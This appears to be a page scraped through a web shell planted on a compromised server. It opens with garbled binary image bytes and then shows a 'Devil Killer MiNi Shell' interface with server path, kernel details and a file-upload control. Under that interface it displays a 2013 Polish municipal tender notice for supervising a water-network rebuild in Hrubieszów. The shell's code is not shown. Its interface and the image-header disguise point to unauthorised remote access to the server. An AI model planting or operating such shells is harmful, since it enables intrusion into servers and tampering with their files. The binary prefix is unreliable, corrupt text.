JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/249555-N-2013.html

<p class="kh_header"><b>Hrubieszów: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania pn: Przebudowa 10 289,00 mb sieci wodociągowej, 253 szt. przyłączy wodociągowych oraz budowa wodociągu o długości 18,00 mb w miejscowości Hrubieszów - część 1 (Śródmieście wraz z Osiedlem Jagiellońskim oraz ul. Wyzwolenia) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II</b><br>
<b>Numer ogłoszenia: 249555 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania pn: Przebudowa 10 289,00 mb sieci wodociągowej, 253 szt. przyłączy wodociągowych oraz budowa wodociągu o długości 18,00 mb w miejscowości Hrubieszów - część 1 (Śródmieście wraz z Osiedlem Jagiellońskim oraz ul. Wyzwolenia) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi pełnienie funkcji inspektora nadzoru inwestorskiego w pełnym zakresie, zgodnie z art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane, nad realizacją zadania pn. Przebudowa 10 289,00 mb sieci wodociągowej, 253 szt. przyłączy wodociągowych oraz budowa wodociągu o długości 18,00 mb w miejscowości Hrubieszów - część 1 (Śródmieście wraz z Osiedlem Jagiellońskim oraz ul. Wyzwolenia) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia  w wodę Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II.
1.	Zakres obowiązków inspektora nadzoru wynika z art. 25 i 26 ustawy z dnia 7 lipca 1994r. - Prawo budowlane a zakres nadzorowanych robót określają : dokumentacja projektowa, specyfikacje techniczne wykonania robót, przedmiary robót , wyjaśnienia i odpowiedzi na pytania wykonawców, a będzie obejmował                   w szczególności:
a)	reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli              w zakresie zgodności realizowanych robót z dokumentacją projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót, przedmiarem robót oraz aktualnie dostępną wiedzą techniczną, sztuką budowlaną obowiązującymi przepisami w szczególności prawem budowlanym, polskimi i europejskimi normami, zasadami i warunkami określonymi w decyzjach min. w decyzjach pozwolenia na budowę itp.;
b)	kontrola prawidłowości prowadzenia dzienników budowy i dokonywanie wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego; 
c)	kontrolowanie przestrzegania przez Wykonawcę Robót, dostaw, zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy, p.poż i ochrony środowiska;
d)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu; 
e)	sprawdzanie jakości wykonywanych robót oraz zainstalowanych urządzeń,                   materiałów , a także zapobieganie zastosowaniu wyrobów budowlanych wadliwych    i niedopuszczonych do obrotu i stosowania w budownictwie;
f)	potwierdzanie faktycznie wykonywanych robót i sprawowanie nadzoru nad usunięciem wad i usterek przez Wykonawcę robót budowlanych; wydawanie poleceń i instrukcji Wykonawcy robót budowlanych celem prawidłowego i rzetelnego wykonania robót określonych w umowie;                       
g)	prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca robót budowlanych nie wypełnia swoich obowiązków z należytą starannością, wiedzą techniczną i postanowieniami zawartej z nim umowy;
h)	kontrolę jakości używanych materiałów zgodnie z prawem, żądania dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę robót budowlanych certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem;
i)	żądanie usunięcia przez Wykonawcę robót budowlanych ujawnionych wad                w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia należnego Wykonawcy robót budowlanych kar umownych w przypadku nie usunięcia tych wad;
j)	 udział w czynnościach odbioru dokumentacji powykonawczej, odbioru końcowego, gwarancyjnego i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do potwierdzenia gotowości do odbioru oraz przekazania Zamawiającemu protokołów odbioru i dokumentacji powykonawczej;
k)	współpraca z Wykonawcą robót i Zamawiającym w zakresie wykonawstwa robót budowlanych:
- kontrola dostaw urządzeń i materiałów na plac budowy ze szczególnym uwzględnieniem ich kompletności, sposobu i czasu magazynowania oraz zgodności   z dokumentacją projektową,
-sprawdzanie materiałów budowlanych i instalacyjnych, urządzeń oraz dostaw, jakie mają być wbudowane zgodnie z dokumentacją projektową, sprawdzanie jakości dokumentów, zezwoleń, aprobat technicznych, deklaracji zgodności, certyfikatów, znaków zgodności itd., w celu uniknięcia użycia materiałów uszkodzonych, wadliwych,
- w uzgodnieniu z Zamawiającym. zatwierdzanie proponowanych metod wykonywania robót budowlanych, włączając w to roboty tymczasowe, zaproponowane przez Wykonawcę,
- rekomendowanie wszystkich zmian w planach i specyfikacjach technicznych, które mogą okazać się niezbędne lub pożądane podczas, lub w następstwie wykonywania robót budowlanych,
- monitorowanie postępu robót, kontrola zakresu, ilości i wartości robót z przyjętym harmonogramem robót wykonawcy,
- sprawdzanie odpowiedniości i autentyczności wszystkich certyfikatów ubezpieczeń, zabezpieczeń, gwarancji, praw własności itd., za które Wykonawca jest odpowiedzialny zgodnie z warunkami umowy,
- organizowanie dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne,
- przeprowadzanie regularnych inspekcji placu budowy, sprawdzających jakość wykonania i materiałów zgodnie z Umową oraz dobrą praktyką inżynierską,
- organizowanie wraz z Zamawiającym cyklicznych narad koordynacyjnych na placu budowy (co najmniej raz w miesiącu, a jeśli zajdzie potrzeba - na życzenie Zamawiającego ) oraz przygotowywanie notatek w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót, sporządzanie protokołów ze spotkań,
- egzekwowanie zgodności wykonanych robót z określonymi wymaganiami technicznymi i zapisami kontraktowymi,
- potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także - na żądanie Zamawiającego - kontrolowanie rozliczenia budowy,
- dbałość o sporządzanie dokumentacji fotograficznej w trakcie prowadzenia inwestycji oraz jej kontrola,
- wydawanie Wykonawcy, kierownikowi budowy i/lub kierownikowi robót poleceń dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
- żądanie od Wykonawcy, kierownika budowy i/lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność            z dokumentacją projektową i/lub pozwoleniem na budowę,
- sprawdzanie i odbieranie robót budowlanych ulegających zakryciu lub zanikających, prowadzenie prób i odbiorów technicznych instalacji, urządzeń technicznych oraz przygotowywanie i branie udziału w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania,
- skompletowanie dokumentacji Wykonawcy i oświadczeń wymaganych przez odpowiednie uregulowania oraz współpraca z Zamawiającym w otrzymaniu pozwoleń na użytkowanie,
- przegląd, ocena kompletności oraz zgodności dokumentacji powykonawczej ze stanem istniejącym i dostarczenie jej do Zamawiającego wraz z dokumentacją dotyczącą nadzorowanych robót  w formie uzgodnionej z Zamawiającym,
- po zakończeniu robót, podczas okresu zgłaszania wad i w okresie rękojmi dla umów, lecz nie dłużej niż przewiduje to końcowa data gwarancji i rękojmi z tytułu prac i usług świadczonych w ramach umowy, uczestniczenie w nadzorowaniu inspekcji gwarancyjnych. dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
l)  kontrolowanie szczegółowych rozliczeń budowy zgodnie z zapisami umowy             o roboty budowlane zawartej przez Zamawiającego z ich Wykonawcą,
m) sporządzenie dokumentacji archeologicznej z przeprowadzonego nadzoru, sporządzenie i złożenie sprawozdania do WUOZ w Lublinie Delegatura w Zamościu w terminie nie dłuższym niż 30 dni po zakończeniu prac terenowych,
  n)   działanie w ramach zawartej umowy związane z nadzorem z ramienia     
        Zamawiającego nad prowadzonymi robotami budowlanymi oraz rozliczenie umowy,  
        wynikające z uwarunkowań realizowanego zadania inwestycyjnego, 
        a w szczególności wymagań Instytucji Zarządzającej,
o)	wykonywanie obowiązków w ścisłej współpracy z Zamawiającym, zgodnie z jego poleceniami i obowiązującymi przepisami oraz regulacjami stosowanymi dla projektów współfinansowanych ze środków Unii Europejskiej - Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013, 
p)	Inspektor nadzoru nie może zaciągać w imieniu Zamawiającego żadnych zobowiązań mogących narazić zamawiającego na straty materialne i finansowe. Dotyczy to w szczególności decyzji związanych ze sposobem realizacji zadania przez wykonawcę robót,
q)	w związku z gwarancja jaką Wykonawca robót gwarantuje Zamawiającemu  na wykonany przedmiot zamówienia inspektor nadzoru będzie obowiązany  do wykonania czynności w imieniu Zamawiającego w ramach nadzoru inwestorskiego w okresie gwarancji, w szczególności w przypadku zgłoszenia usterek spowodowanych niewłaściwym wykonawstwem,
r)	wykonywanie w imieniu Zamawiającego innych czynności związanych                     z pełnieniem funkcji inspektora nadzoru inwestorskiego wymaganych obowiązującymi przepisami prawa.

2.	Usługa pełnienia funkcji inspektora nadzoru inwestorskiego będzie pełniona          w specjalnościach:
-	Inspektor nadzoru w specjalności instalacyjnej w zakresie instalacji sieci wodociągowych i kanalizacyjnych ;
-	Inspektor nadzoru w specjalności drogowej;
-	Inspektor nadzoru w specjalności archeologicznej.
3.	Pełnienie funkcji inspektora nadzoru inwestorskiego obejmuje niżej wymieniony zakres rzeczowy: Przebudowa 10 289,00 mb sieci wodociągowej, 253 szt. przyłączy wodociągowych oraz budowa wodociągu o długości 18,00 mb w miejscowości  Hrubieszów - część 1  (Śródmieście wraz z Osiedlem Jagiellońskim oraz ul. Wyzwolenia) w ramach realizacji projektu pn.: Czysta Woda na Pobużu - Transgraniczny System Zaopatrzenia w wodę Hrubieszowa i Włodzimierza Wołyńskiego - ETAP II.
Przebudowa i budowa sieci wodociągowej obejmuje poniższe ulice:
ul. Górna, ul. Pogodna, ul. 27 Wołyńskiej Dywizji Piechoty AK, ul. Szewska, ul. Pl. Staszica, ul. Krucza , ul. Konopnickiej, ul. 3-go Maja, ul. 3-go Maja - osiedle HSM, ul. Ciesielczuka, ul, Kościelna, ul. Narutowicza, ul. Prusa, ul. Targowa, ul. Podzamcze, ul. Ludna, ul. Szeroka, ul. Rynek, ul. mjr. H. Dobrzańskiego Hubala, ul. Nowa, ul. Piłsudskiego, ul. Jagiełły, ul. Bartłomieja, ul. Grunwaldzka, ul. Dwernickiego, ul. Matejki, ul. Kilińskiego, ul. Lubelska, ul. Wyzwolenia.
Układ urbanistyczny Śródmieścia objęty jest prawną ochroną konserwatorską. Wszelkie działania w tym obszarze wymagają zgody Wojewódzkiego Konserwatora Zabytków. Głównymi elementami podlegającymi ochronie są: historyczne rozplanowanie miasta, obiekty wpisane do rejestru zabytków i znajdujące się w ewidencji zabytków, zewnętrzne sylwety miasta, ukształtowanie krajobrazu obejmujące wyspowy charakter historycznego układu miasta, konfiguracja skarpy nadrzecznej oraz otwarta przestrzeń łąk doliny Huczwy. Prowadzenie robót w tym terenie należy wykonać zgodnie z wydanym pozwoleniem konserwatorskim na prowadzenie robót. 
Trasy sieci przebiegają po terenie stanowiącym własność Gminy Miejskiej Hrubieszów, w pasie dróg krajowych, wojewódzkich, powiatowych i gminnych.
Sieć wodociągowa z przyłączami realizowana będzie w terenie zurbanizowanym w drogach:
-	miejskich o nawierzchni nieutwardzonej gruntowo-żużlowej oraz utwardzonej   asfaltowej, 
-	gminnych o nawierzchni nieutwardzonej   gruntowej, gruntowo-żużlowej oraz utwardzonej-asfaltowej, 
-	powiatowych o nawierzchni utwardzonej   asfaltowej, 
-	wojewódzkiej o nawierzchni utwardzonej   asfaltowej, 
-	oraz po terenach prywatnych zabudowany budynkami mieszkalnymi i gospodarczymi,
-	z infrastrukturą podziemną:
-	sieci energetycznych podziemnych i naziemnych, 
-	sieci gazowej,
-	sieci telekomunikacyjnych - nadziemnych i podziemnych,
-	sieci telewizji kablowej,
-	sieci ciepłowniczej,
-	sieci kanalizacji deszczowej,
-	sieci kanalizacji sanitarnej - ciśnieniowej oraz grawitacyjnej;
W zakres przebudowy sieci wodociągowej wchodzi:
-	likwidacja (demontaż) wodociągu w zakresie średnic DN32 - DN300, 
-	wraz z armaturą (dotyczy odcinków wykonywanych wykopem otwarty),
-	likwidacja hydrantów, skrzynek ulicznych na nieczynnych sieciach),
-	demontaż uzbrojenia przepinanych przyłączy wodociągowych,
-	demontaż wymienianych zasuw,
-	likwidacja części komór zasuw,
-	budowa nowych przewodów wodociągu w zakresie średnic DN32 - DN300 wraz z armaturą,
-	przełączenie istniejących odbiorców do wykonanej sieci wodociągowej,
-	naprawa pozostałych komór zasuw.
Część przewodów sieci wodociągowej znajduje się w pasie dróg o różnych kategoriach. Wiąże się to dodatkowo z robotami demontażowymi i odtworzeniowymi ciągów jezdnych, pieszo-jezdnych, pieszych i poboczy. 
Istniejąca sieć wodociągowa wykonana jest z rur stalowych, azbesto-cementowych, żeliwnych, PVC. Rury ułożone są na głębokościach zmiennych z przykryciem 1,2 - 2,0 m. 

Zakres robót Śródmieście wraz z Osiedlem Jagiellońskim obejmuje poniższy zakres:
-	DN300 (przewiert sterowany)	 1016,0 m
-	DN300 (wykop otwarty)	1291,5 m
-	DN250 (przewiert sterowany)	122,0 m
-	DN250 (wykop otwarty)	71,0 m
-	DN250 (kraking)	753,5 m
-	DN200 (przewiert sterowany)	650,5 m
-	DN200 (wykop otwarty)	456,5 m
-	DN150 (przewiert sterowany)	125,5 m
-	DN150 (wykop otwarty)	1432,5 m
-	DN125 (przewiert sterowany)	169,0 m
-	DN125 (wykop otwarty)	870,5 m
-	DN100 (przewiert sterowany)	260,5 m
-	DN100 (wykop otwarty)	482,0 m
-	DN80 (przewiert sterowany)	159,5 m
-	DN80 (wykop otwarty)	803,0 m
-       DN50 (przewiert sterowany)	76,5 m
-	DN50 (wykop otwarty)	389,5 m
Razem: 9 129,5 m
Przyłącza wodociągowe
-	DN80 (wykop otwarty)	10,0m
	DN50 (wykop otwarty)	92,0m
-	DN40 (wykop otwarty)	108,0m
-	DN32 (wykop otwarty)	306,0m
-	DN32 (przewiert)	8,0m
-	DN25 (wykop otwarty)	10,0m
Razem: 534,0m
-	podłączenia domowe (przepięcie istniejących)	248 szt.

Zakres robót w ulicy Wyzwolenia obejmuje poniższy zakres:
-	DN 32(wykop otwarty)	6,0 m
-	DN 40(wykop otwarty)	6,0 m
-	DN 50(wykop otwarty)	2,0 m
-	DN 100(kraking)	305,0 m
-	DN 100(wykop otwarty)	27,0 m
-	DN150(wykop otwarty)	25,0 m
-	DN200(kraking)	254,5 m
Razem: 625,50m
w tym podłączenia domowe (przepięcie istniejących) - 5szt.
Budowa:
-	DN80 (wykop otwarty)	18,0 m
-	
4.	W postępowaniu przetargowym na wykonanie robót budowlanych zawarto umowę            z Zakładem Remontowo-Budowlanym  w Zamościu Adam Kustra ul. Wyszyńskiego 55/19, 22-400 Zamość za kwotę 6 343 093,49 PLN zł brutto.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości 3 000,00 zł. (słownie: trzy tysiące zł 0/100).
2.	Wadium należy wnieść w terminie do dnia 02 grudnia 2013 r. do godz. 13.00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj.
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi polegające na świadczeniu funkcji inspektora nadzoru inwestorskiego nad realizacją co najmniej dwóch (2) robót budowlanych (budowie, przebudowie sieci wodociągowych lub kanalizacyjnych )o wartości robót min. 2 000 000,00 zł brutto (słownie: dwa miliony złotych) każda oraz nadzorował przebudowę budowę sieci wod-kan wykonanej przewiertem horyzontalnym sterowanym na  odcinku długości co najmniej 500 m, co potwierdzi załączając dowody, że usługi zostały wykonane lub są wykonywane należycie. Dowodem na powyższe będą referencje, poświadczenie lub oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi nadzoru inwestorskiego, tj.
- Inspektor nadzoru w branży sanitarnej-kordynator posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji    i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych oraz nie mniej niż 3 - letnie doświadczenie zawodowe.                        
- Inspektor nadzoru w branży drogowej - posiadający uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz nie mniej niż    3 - letnie doświadczenie zawodowe.                        
- Inspektor nadzoru archeologicznego - osoba posiadająca tytuł magistra archeologii  oraz nie mniej niż 3 - letnie doświadczenie zawodowe.                        
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na kwotę nie niższą niż 50 000 zł.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

